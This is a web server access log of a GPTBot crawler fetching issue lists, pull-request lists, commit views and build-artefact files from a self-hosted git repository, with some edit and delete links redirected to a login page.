"/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26377] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=source" [Client 74.7.227.38] [Length 26374] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=closed&type=all" +[17/Feb/2026:19:46:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" +[17/Feb/2026:19:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" +[17/Feb/2026:19:46:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" +[17/Feb/2026:19:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" +[17/Feb/2026:19:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 1822591] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" +[17/Feb/2026:19:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 1025] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" +[17/Feb/2026:19:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?state=open&type=all" [Client 74.7.227.38] [Length 10121] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:19:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:46:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:46:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:19:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:19:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:19:46:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&sort=leastupdate&state=open&type=all" +[17/Feb/2026:19:46:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:46:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:19:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:46:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:19:46:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:46:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9935] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:46:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:19:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:46:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:19:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:46:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:46:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:46:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" [Client 74.7.227.38] [Length 9855] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.pyz" +[17/Feb/2026:19:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fdirectory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 25380] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:46:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply%2ftarget-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 27651] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:46:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fcodemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 27046] [Gzip 5.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:19:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fdirectory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 25392] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:19:46:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fcodemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 26663] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fdirectory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 25368] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2ftarget-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 29131] [Gzip 6.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:19:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2ftoolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 26754] [Gzip 5.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:46:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2freply%2fcmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 36056] [Gzip 10.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 